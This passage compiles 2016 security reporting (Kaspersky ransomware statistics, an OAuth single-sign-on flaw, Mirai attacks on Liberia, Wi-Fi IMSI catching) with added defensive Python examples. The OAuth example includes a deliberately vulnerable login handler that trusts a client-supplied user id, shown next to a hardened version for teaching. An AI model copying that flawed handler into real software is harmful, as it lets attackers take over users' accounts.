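                alerts.append({"kind": "bruteforce", "src": ev["src"],
                               "failures": len(recent), "time": ev["time"]})
        elif ev["event_id"] == 4624 and ev["src"] in flagged:
            # A success from a source that was guessing passwords: treat the
            # account as compromised and expect hands-on-keyboard activity next.
            alerts.append({"kind": "compromised", "src": ev["src"],
                           "user": ev["user"], "time": ev["time"]})
    return alerts

# Constructed Security-log extract: one guessing source that eventually gets
# in, one user who mistypes a password once, one non-RDP service logon.
SAMPLE_LOG = """2016-09-12T02:00:01,4625,10,administrator,198.51.100.23
2016-09-12T02:00:03,4625,10,administrator,198.51.100.23
2016-09-12T02:00:05,4625,10,admin,198.51.100.23
2016-09-12T02:00:07,4625,10,administrator,198.51.100.23
2016-09-12T02:00:09,4625,10,root,198.51.100.23
2016-09-12T02:00:11,4625,10,administrator,198.51.100.23
2016-09-12T02:01:30,4624,10,administrator,198.51.100.23
2016-09-12T08:15:00,4625,10,jsmith,10.0.0.15
2016-09-12T08:15:20,4624,10,jsmith,10.0.0.15
2016-09-12T09:00:00,4624,3,svc_backup,10.0.0.8
"""

if __name__ == "__main__":
    for a in detect_rdp_bruteforce(SAMPLE_LOG.splitlines()):
        print(a)
```

The 'compromised' alert is the one to act on: in the Dcryptor case the next step is a process launch with DiskCryptor, so pairing this rule with process-creation auditing on the same host closes the gap.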

Ransomware in scripting languages

Another trend that has attracted our attention is the growing number of cryptors written in scripting languages. In the third quarter of 2016, we came across several new families written in Python:

HolyCrypt (Trojan-Ransom.Python.Holy)
CryPy (Trojan-Ransom.Python.Kpyna)
Another example that emerged in June was Stampado (Trojan-Ransom.Win32.Stampa) written in AutoIt, the automation language.

The number of users attacked by ransomware

In Q3 2016, 821,865 unique KSN users were attacked by cryptors – that is 2.6 times more than the previous quarter.


Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2016)

The largest contribution was made by representatives of the Trojan-Downloader.JS.Cryptoload family. These Trojan downloaders, written in JavaScript, were designed to download and install representatives of different cryptor families in the system.


Geography of Trojan-Ransom attacks in Q3 2016 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors**
1 Japan 4.83
2 Croatia 3.71
3 Korea 3.36
4 Tunisia 3.22
5 Bulgaria 3.20
6 Hong Kong 3.14
7 Taiwan 3.03
8 Argentina 2.65
9 Maldives 2.63
10 Australia 2.56
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

As in the previous quarter, Japan topped this rating.

Newcomers to this Top 10 were Tunisia, Hong Kong, Argentina, and Australia, with Italy, Djibouti, Luxembourg, and the Netherlands all making way.

Top 10 most widespread cryptor families

Name Verdict* % of attacked users**
1 CTB-Locker Trojan-Ransom.Win32.Onion/Trojan-Ransom.NSIS.Onion 28.34
2 Locky Trojan-Ransom.Win32.Locky 9.60
3 CryptXXX Trojan-Ransom.Win32.CryptXXX 8.95
4 TeslaCrypt Trojan-Ransom.Win32.Bitman 1.44
5 Shade Trojan-Ransom.Win32.Shade 1.10
6 Cryakl Trojan-Ransom.Win32.Cryakl 0.82
7 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 0.73
8 Cerber Trojan-Ransom.Win32.Zerber 0.59
9 CryptoWall Trojan-Ransom.Win32.Cryptodef 0.58
10 Crysis Trojan-Ransom.Win32.Crusis 0.51
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

CTB-Locker once again occupied first place in Q3. The top three also included the now infamous Locky and CryptXXX. Despite the fact that the owners of TeslaCrypt disabled their servers and posted a master key to decrypt files back in May 2016, it continues to make it into our rating (although its contribution dropped 5.8 times in Q3).


Crysis (verdict Trojan-Ransom.Win32.Crusis) was a newcomer to the TOP 10 in Q3. This Trojan was first detected in February 2016 and since then has undergone several code modifications.

Interestingly, the list of email addresses used for ransom demands by the distributors of Crysis partly matches the list associated with the Cryakl and Aura Trojans. Analysis of the executable files from these families, however, shows that they do not share the same code. It appears that these malicious programs are spread via a partner scheme, and because some distributors are distributing several different Trojans simultaneously they are using the same email address to communicate their ransom demands to the victims.


The Polyglot/MarsJoke Trojan appeared in August 2016 (we recently published a detailed analysis of it). It is not included in the TOP 10, but it does have one interesting feature: the authors have tried to imitate the well-known CTB-Locker, which tops the rating for the second quarter in a row. Both the external and internal design of this piece of malware is very similar to the "original", but the cybercriminals made a mistake that allows files to be decrypted without paying a ransom.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2016, Kaspersky Lab solutions blocked 171,802,109 attacks launched from web resources located in 190 countries around the world. 45,169,524 unique URLs were recognized as malicious by web antivirus components.

83% of notifications about blocked web attacks were triggered by attacks coming from web resources located in 10 countries.


Distribution of web attack sources by country, Q3 2016

The US (33.51%) remained top of this rating in Q3. Russia (9%) dropped from second to fourth, while Germany came second with a share of 10.5%. Canada left the Top 10, with Cyprus a newcomer in ninth place (1.24%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

Please note that starting this quarter, this rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked **
1 Slovenia 30.02
2 Bulgaria 29.49
3 Armenia 29.30
4 Italy 29.21
5 Ukraine 28.18
6 Spain 28.15
7 Brazil 27.83
8 Belarus 27.06
9 Algeria 26.95
10 Qatar 26.42
11 Greece 26.10
12 Portugal 26.08
13 Russia 25.87
14 France 25.44
15 Kazakhstan 25.26
16 Azerbaijan 25.05
17 United Arab Emirates 24.97
18 Vietnam 24.73
19 China 24.19
20 Albania 23.23
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.2% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.


Geography of malicious web attacks in Q3 2016 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Croatia (14.21%), the UK (14.19%), Singapore (13.78%), the US (13.45%), Norway (13.07%), Czech Republic (12.80%), South Africa (11.98%), Sweden (10.96%), Korea (10.61%), the Netherlands (9.95%), and Japan (9.78%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2016, Kaspersky Lab’s file antivirus detected 116,469,744 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Please note that starting this quarter, the rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Vietnam 52.07
2 Afghanistan 52.00
3 Yemen 51.32
4 Somalia 50.78
5 Ethiopia 50.50
6 Uzbekistan 50.15
7 Rwanda 50.14
8 Laos 49.27
9 Venezuela 49.27
10 Philippines 47.69
11 Nepal 47.01
12 Djibouti 46.49
13 Burundi 46.17
14 Syria 45.97
15 Bangladesh 45.48
16 Cambodia 44.51
17 Indonesia 43.31
18 Tajikistan 43.01
19 Mozambique 42.98
20 Myanmar 42.85
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 22.9% of computers globally faced at least one Malware-class local threat during the third quarter.


The safest countries in terms of local infection risks were: Spain (14.68%), Singapore (13.86%), Italy (13.30%), Finland (10.94%), Norway (10.86%), France (10.81%), Australia (10.77%), Czech Republic (9.89%), Croatia (9.70%), Ireland (9.62%), Germany (9.16%), the UK (9.09%), Canada (8.92%), Sweden (8.32%), the USA (8.08%), Denmark (6.53%), and Japan (6.53%).

One oAuth 2.0 hack, 1 Billion Android App Accounts potentially exposed
5.11.2016 securityaffairs Android

Security researchers demonstrated that an incorrect OAuth 2.0 implementation allows a simple remote hack that exposes more than 1 billion Android app accounts.
A simple remote hack devised by a group of security researchers threatens an amazing number of Android and iOS apps. An attacker can use the technique to sign into any victim's mobile app account without the legitimate user's knowledge.

The research team from the Chinese University of Hong Kong is composed of Ronghai Yang, Wing Cheong Lau, and Tianyu Liu. The experts discovered that the vast majority of popular mobile apps that use a single sign-on (SSO) service do not properly implement the OAuth 2.0 protocol.

The OAuth 2.0 authentication protocol is widely used on social networking sites; every day billions of users access their profiles on Facebook and Google+ using it.

Using OAuth 2.0, users can sign in to third-party services by verifying an existing identity through their accounts on popular web services such as Google, Facebook, or Sina.

Once authenticated, users do not have to provide their credentials again to access other services implementing the OAuth 2.0 protocol.

This process enables users to sign in to any service without providing additional usernames or passwords. This magic is possible because when a user logs into a third-party app via OAuth, the app checks with the ID provider (i.e. Facebook, Google).
The ID provider, in turn, provides an access token to that mobile app's server, which uses it to request the user's authentication information from the ID provider (i.e. Facebook). In this way, the server is able to check the user's identity against data provided by the ID provider and authorize the login.
Below is an image from the slides the team presented at Black Hat Europe.
oAuth 2.0 process
The Chinese researchers discovered that a large number of Android apps did not properly check the validity of the information passed by the ID provider.
The experts explained that instead of verifying the OAuth information tied to the access token in order to authenticate the user, the app server would only check that the information had been passed by a legitimate ID provider.
This implementation opens the door to attackers, who can install the flawed app on their own mobile devices, log in to their own account, and then simply change their username to the victim's by setting up a server that modifies the data sent from Facebook, Google or other ID providers.
oAuth 2.0 attack
With this technique, the attacker can access data used by the flawed app, potentially exposing sensitive information, or use the app on behalf of the victim.
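The server-side mistake the researchers describe, next to the corrected handler, as an added example (not the researchers' code and not any vendor's API): the flawed server accepts the user id that arrives with a genuine token, while the fixed server derives the identity from the ID provider's own answer about that token and checks the token was issued to this app. The ID provider and its token-inspection endpoint are a constructed stand-in for Facebook's or Google's.

```python
from dataclasses import dataclass
from typing import Dict, Optional

APP_ID = "example-travel-app"   # constructed identifier of *this* mobile app

@dataclass
class TokenInfo:
    user_id: str    # the account the IdP actually issued the token for
    app_id: str     # the app (audience) the token was issued to
    expired: bool = False

class FakeIdP:
    """Constructed stand-in for the provider's token-inspection endpoint
    (the kind of call the app server makes to Facebook/Google)."""
    def __init__(self) -> None:
        self._tokens: Dict[str, TokenInfo] = {}

    def issue(self, user_id: str, app_id: str) -> str:
        token = f"tok-{len(self._tokens) + 1}"
        self._tokens[token] = TokenInfo(user_id, app_id)
        return token

    def inspect(self, token: str) -> Optional[TokenInfo]:
        return self._tokens.get(token)

def vulnerable_login(idp: FakeIdP, payload: Dict[str, str]) -> Optional[str]:
    """The mistake the article describes: the server only checks that the
    token is genuine, then trusts the user id the *client* sent alongside it."""
    if idp.inspect(payload["access_token"]) is None:
        return None
    return payload["user_id"]                 # attacker-controlled field

def hardened_login(idp: FakeIdP, payload: Dict[str, str]) -> Optional[str]:
    """Fix: identity comes from the IdP's answer about the token, and the
    token must have been issued to this app, not to some other app."""
    info = idp.inspect(payload["access_token"])
    if info is None or info.expired or info.app_id != APP_ID:
        return None
    return info.user_id                       # server-verified identity

def demo() -> Dict[str, Optional[str]]:
    """Replay the scenario from the talk against both handlers."""
    idp = FakeIdP()
    attacker_token = idp.issue(user_id="attacker", app_id=APP_ID)
    # The attacker holds a valid token for their *own* account but, sitting
    # between the app and the IdP, rewrites the user id to the victim's.
    forged = {"access_token": attacker_token, "user_id": "victim"}
    # A token some other app obtained for the victim must not work either.
    other_app_token = idp.issue(user_id="victim", app_id="some-other-app")
    reused = {"access_token": other_app_token, "user_id": "victim"}
    return {"vulnerable_forged": vulnerable_login(idp, forged),
            "hardened_forged": hardened_login(idp, forged),
            "hardened_other_app": hardened_login(idp, reused)}

if __name__ == "__main__":
    print(demo())
```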
“The problem is a pretty basic mistake,” Lau told Forbes.

“The impact, he said, could be severe. For instance, if the hacker broke into a travel app, they could learn the full itinerary of an individual. For a hotel booking app, they could book a room and have the victim pay for it. Or they could simply steal personal data, like addresses or bank details.” wrote Thomas Fox-Brewster from Forbes.

"A lot of third party developers are ma and pa shops, they don't have the capability. Most of the time they're using Google and Facebook recommendations, but if they don't do it correctly, their apps will be wide open."

The experts have found hundreds of popular US and Chinese Android apps that support an SSO service. The number of downloads is huge: the researchers explained that apps with a combined total of over 2.4 billion downloads are vulnerable to this attack.

The experts estimated that over a Billion different mobile app accounts are at risk of being hijacked with their attack.

The researchers did not perform any tests on iOS devices, but they believe the attack would also work on iOS apps.

"Although our current attack is demonstrated over the Android platform, the exploit itself is platform-agnostic: any iOS or Android user of the vulnerable mobile app is affected as long as he/she has used the OAuth2.0-based SSO service with the app before," the researchers said.

Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country
4.11.2016 thehackernews BotNet
Someone is trying to take down the whole Internet of a country by launching massive distributed denial-of-service (DDoS) attacks using a botnet of insecure IoT devices infected by the Mirai malware.
It all started in early October when a cybercriminal publicly released the source code of Mirai – a piece of nasty IoT malware designed to scan for insecure IoT devices and enslave them into a botnet, which is then used to launch DDoS attacks.
Just two weeks ago, the Mirai IoT botnet caused a vast Internet outage by launching massive DDoS attacks against DNS provider Dyn, and it later turned out that just 100,000 infected IoT devices participated in the attacks.
Experts believe that the future DDoS attack could reach 10 Tbps, which is enough to take down the whole Internet in any nation state.
One such incident has been unfolding over the past week: hackers are trying to take down the entire Internet of Liberia, a small African country, using another Mirai IoT botnet known as Botnet 14.
Security researcher Kevin Beaumont has noticed that Botnet 14 has begun launching DDoS attacks against the networks of "Lonestar Cell MTN", the telecommunications company that provides Internet access to all of Liberia via a single entry point from an undersea fiber cable.
"From monitoring, we can see websites hosted in country going offline during the attacks — Additionally, a source in country at a Telco has confirmed to a journalist they are seeing intermittent internet connectivity, at times which directly match the attack," Beaumont said in a blog post published today.
According to Beaumont, transit providers confirm that the attacks were over 500 Gbps in size, but last for a short period. This volume of traffic indicates that the "Shadows Kill" Botnet, as the researcher called it, is "owned by the actor which attacked Dyn."
Why Is Taking Down Liberia's Internet So Easy?
Over a decade of civil war in Liberia destroyed the country's telecommunications infrastructure, and at that time a very small portion of citizens in Liberia had access to the internet via satellite communication.
However, some progress was made later, in 2011, when a 17,000 km Africa Coast to Europe (ACE) submarine fiber-optic cable was deployed from France to Cape Town via the west coast of Africa.
The ACE fiber cable, at depths close to 6,000 meters below sea level, eventually provides broadband connectivity to more than 23 countries in Europe and Africa.
What's shocking? The total capacity of this cable is just 5.12 Tbps, which is shared between all of the 23 countries.
Since the massive DDoS attack against DynDNS used a Mirai botnet of just 100,000 hacked IoT devices to cut off the Internet for millions of users, one can imagine the capability of the more than 1 million hacked IoT devices currently under the control of the Mirai malware, which is enough to severely impact systems in any nation state.
This is extremely worrying because, with this capacity, an attacker could disrupt Internet services not just in Liberia but in all 23 countries in Europe and Africa that rely on the ACE fiber cable for their Internet connectivity.
The root cause? More insecure, vulnerable IoT devices, more Mirai bots.
So, to protect yourself, you need to be more vigilant about the security of your smart devices, which are often far less clever than their name suggests.
In our previous article, we provided some basic but rather effective measures that will help you protect your smart devices from becoming part of the Mirai botnet. You can also check for yourself whether your IoT device is vulnerable to the Mirai malware. Head on to this article.

Wi-Fi can be turned into IMSI Catcher to Track Cell Phone Users Everywhere
4.11.2016 thehackernews Mobil
Here's a new danger to your smartphone security: Your mobile device can be hijacked and tracked without your knowledge.
Remember Stingrays?
The controversial cell phone spying tool, also known as an "IMSI catcher," has long been used by law enforcement to track and monitor mobile users by mimicking a cellphone tower and tricking their devices into connecting to it. Sometimes it even intercepts calls and Internet traffic, sends fake texts, and installs spyware on a victim's phone.
Setting up such Stingray-type surveillance devices, of course, is expensive and takes a lot of effort, but researchers have now found a new, far cheaper way to do the same thing with a simple Wi-Fi hotspot.
Yes, a Wi-Fi network can capture IMSI numbers from nearby smartphones, allowing almost anyone to track and monitor people wirelessly.
IMSI or international mobile subscriber identity is a unique 15-digit number used for authentication of a person when moving network to network. The number is stored in the read-only section of a SIM card and with the mobile operator.
Note: Don't confuse the IMSI number with the IMEI number. IMSI is tied to a user, while IMEI is tied to a device.
Stealing your Fingerprints to Track you Everywhere
In a presentation at Black Hat Europe, researchers Piers O'Hanlon and Ravishankar Borgaonkar from Oxford University demonstrated a new type of IMSI catcher attack that operates over WiFi, allowing anyone to capture a smartphone's IMSI number within a second as users pass by.
The attack would then use that IMSI number to spy on the user's every movement.
The actual issue lies in the way most modern smartphones in the world, including Android and iOS devices, connect to Wi-Fi networks.
There are two widely implemented protocols in most modern mobile operating systems:
Extensible Authentication Protocol (EAP)
Authentication and Key Agreement (AKA) protocol
These protocols allow smartphones to auto-connect to public WiFi hotspots.
Modern smartphones are programmed to automatically connect to known Wi-Fi networks by handing over their IMSI numbers to log into the network, without the owner's interaction.
So attackers exploiting the WiFi authentication protocols could set up a "rogue access point" masquerading as a well-known WiFi network and trick smartphones in range into connecting.
Once connected, the rogue access point extracts their IMSI numbers immediately. This captured unique identifier of your smartphone would then allow attackers to track your movements wherever you go.
Intercepting WiFi Calling to Steal Your Unique Identity Number
The researchers also demonstrated another attack vector whereby attackers can hijack the WiFi calling feature offered by mobile operators.
This technology is different from voice calling in apps such as WhatsApp or Skype, which use voice over IP.
WiFi calling, which is supported on iOS and Android devices, allows users to make voice calls over WiFi by connecting to the operator's Evolved Packet Data Gateway (EPDG) using the encrypted IP security (IPsec) protocol.
Like the WiFi auto connect feature, the Internet Key Exchange (IKEv2) protocol used for authenticating WiFi calling is also based on identities such as the IMSI number, which are exchanged over EAP-AKA.
EAP-AKA exchanges are encrypted, but the problem is that they are not protected by a certificate.
This issue exposes the feature to man-in-the-middle (MITM) attacks, allowing attackers to intercept the traffic from a smartphone trying to make the call over WiFi and quickly extract the IMSI number in seconds, the researchers said.
The good news is that you can disable the Wi-Fi calling feature on your device, but Wi-Fi auto connect can only be disabled when such a network is in range.
The researchers reported the issues to both the mobile OS companies, including Apple, Google, Microsoft and BlackBerry, and operators such as the GSMA, and have been working with them to ensure the future protection of the IMSI number.
Apple, as a result of conversations with the two researchers, has implemented a new technology in iOS 10 that allows handsets to exchange pseudonyms rather than permanent identifiers, helping mitigate the threat.
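Whether a handset is sending its permanent identity or a pseudonym is visible in the identity string it presents, so the mitigation described above can be checked from a packet capture of the EAP-Response/Identity (Wi-Fi) or IKEv2 IDi (Wi-Fi calling) exchange. The following is an added example, not the researchers' code: it decodes the 3GPP NAI format (username prefix and realm layout as defined in 3GPP TS 23.003) and reports which identities leak an IMSI in the clear. The sample identities use the test PLMN (MCC 001, MNC 01) and made-up digits.

```python
import re
from typing import Dict, List

# Leading character of the username, per 3GPP TS 23.003 clause 19.3:
PREFIXES = {
    "0": ("EAP-AKA", "permanent"),   "1": ("EAP-SIM", "permanent"),
    "2": ("EAP-AKA", "pseudonym"),   "3": ("EAP-SIM", "pseudonym"),
    "4": ("EAP-AKA", "fast-reauth"), "5": ("EAP-SIM", "fast-reauth"),
    "6": ("EAP-AKA'", "permanent"),  "7": ("EAP-AKA'", "pseudonym"),
    "8": ("EAP-AKA'", "fast-reauth"),
}
# Realm names the home network: <label(s)>.mnc<MNC>.mcc<MCC>.3gppnetwork.org
REALM_RE = re.compile(
    r"^(?:[a-z0-9-]+\.)*mnc(\d{3})\.mcc(\d{3})\.3gppnetwork\.org$")

def classify_nai(nai: str) -> Dict[str, object]:
    """Decode one EAP-Response/Identity (or IKEv2 IDi) value."""
    user, _, realm = nai.partition("@")
    result = {"nai": nai, "method": None, "kind": "unknown",
              "imsi": None, "mcc": None, "mnc": None, "leaks_imsi": False}
    m = REALM_RE.match(realm.lower())
    if m:
        result["mnc"], result["mcc"] = m.group(1), m.group(2)
    if user and user[0] in PREFIXES:
        result["method"], result["kind"] = PREFIXES[user[0]]
        body = user[1:]
        # A permanent identity is the bare IMSI (6..15 digits) after the prefix;
        # pseudonyms and fast re-auth ids are operator-assigned opaque strings.
        if result["kind"] == "permanent" and body.isdigit() and 6 <= len(body) <= 15:
            result["imsi"] = body
            result["leaks_imsi"] = True
    return result

def leaking_identities(nais: List[str]) -> List[str]:
    """Return the identities that expose a permanent IMSI in the clear."""
    return [n for n in nais if classify_nai(n)["leaks_imsi"]]

# Constructed identities on the test PLMN (MCC 001, MNC 01). The second one
# is the kind of value a pseudonym-using handset sends instead of its IMSI.
SAMPLE_IDENTITIES = [
    "0001010123456789@wlan.mnc001.mcc001.3gppnetwork.org",     # Wi-Fi, EAP-AKA
    "2Gx9kQ2vT7Lp@wlan.mnc001.mcc001.3gppnetwork.org",          # pseudonym
    "0001010123456789@nai.epc.mnc001.mcc001.3gppnetwork.org",  # Wi-Fi calling
    "4a91f03c@wlan.mnc001.mcc001.3gppnetwork.org",              # fast re-auth
]

if __name__ == "__main__":
    for nai in SAMPLE_IDENTITIES:
        r = classify_nai(nai)
        print(f"{str(r['method']):8} {r['kind']:11} "
              f"leaks IMSI: {r['leaks_imsi']}  {nai}")
```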
The duo concluded their research [slides PDF] by showing a proof-of-concept system that demonstrates their IMSI catcher employing passive as well as active techniques.